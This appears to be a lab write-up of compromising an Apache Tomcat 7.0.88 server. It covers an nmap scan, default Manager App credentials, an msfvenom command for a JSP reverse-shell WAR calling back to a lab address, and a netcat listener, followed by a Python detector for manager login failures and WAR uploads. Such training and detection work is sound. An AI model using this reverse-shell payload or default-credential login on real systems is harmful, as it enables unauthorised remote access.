Reconnaissance

Nmap Recon Results

OS Discovery

**Recon open ports**

nmap -sS --min-rate 5000 --open -n 10.129.156.40 -vvv -oG initialscan

Service Enumeration

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

The nmap scan gives one interesting result: port 8080 is open and serving Apache Tomcat (Coyote JSP engine 1.1); the HTTP title identifies it as Apache Tomcat/7.0.88.

Web Service

The next order of business is to browse to the IP in a web browser.

http://10.129.156.40:8080/

On opening the IP in the web browser, we are greeted with the default Tomcat page. After some enumeration, we found the "Manager App" link. Clicking this link presents a login form, as shown below.

Here, after trying a few passwords, we found that clicking the "Cancel" button on the login prompt triggers a 401 error page, as shown in the image.

User: tomcat
Password: s3cret

Once logged in, we notice that the Manager App allows WAR file uploads, so we generate a reverse shell packaged as a .war file:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.31 LPORT=443 --platform windows -a x86 -f war -o shell.war

Select File -> shell.war -> Deploy

Exploitation

We have already uploaded our WAR file and it is listed in the Applications tab of the Manager App, so we start a netcat listener on our box to catch the reverse shell,

then click the shell.war application entry to trigger it.

As we can see, no privilege escalation is needed.
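As an added defensive counterpart to the procedure above (this is not part of the original write-up): a Python check that scans Tomcat access-log lines for repeated 401s on the manager interface followed by a WAR deployment through the Manager App. The log lines are constructed for the example and the `fail_threshold` knob is a hypothetical tuning parameter.

```python
import re
from dataclasses import dataclass

# Constructed Tomcat access-log lines in the default "%h %l %u %t \"%r\" %s %b"
# pattern; addresses, timestamps and sizes are made up for this example.
SAMPLE_LOG = """\
10.10.14.31 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 11156
10.10.14.31 - - [01/Jan/2024:10:00:05 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.31 - - [01/Jan/2024:10:00:09 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.31 - tomcat [01/Jan/2024:10:00:15 +0000] "GET /manager/html HTTP/1.1" 200 17340
10.10.14.31 - tomcat [01/Jan/2024:10:00:40 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 18211
10.10.14.31 - - [01/Jan/2024:10:00:44 +0000] "GET /shell/ HTTP/1.1" 200 0
"""

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

@dataclass
class Finding:
    kind: str    # "manager_auth_failures" or "war_deploy"
    host: str    # client address
    detail: str


def scan_access_log(text, fail_threshold=2):
    """Report repeated 401s on /manager/* (once per client, at fail_threshold)
    and WAR deployments via the HTML upload form or the text deploy endpoint."""
    fails = {}
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        host, method, status = m['host'], m['method'], m['status']
        path = m['path'].split('?', 1)[0]  # drop the query string (e.g. CSRF nonce)
        if path.startswith('/manager/') and status == '401':
            fails[host] = fails.get(host, 0) + 1
            if fails[host] == fail_threshold:
                findings.append(Finding('manager_auth_failures', host,
                                        f'{fail_threshold} x 401 on {path}'))
        elif (method == 'POST' and path == '/manager/html/upload') or (
                method == 'PUT' and path.startswith('/manager/text/deploy')):
            findings.append(Finding('war_deploy', host,
                                    f'{method} {path} as user {m["user"]}'))
    return findings
```

Run it against a real access log by replacing `SAMPLE_LOG` with the file contents; a `war_deploy` finding from an unexpected client or user is the signal worth alerting on.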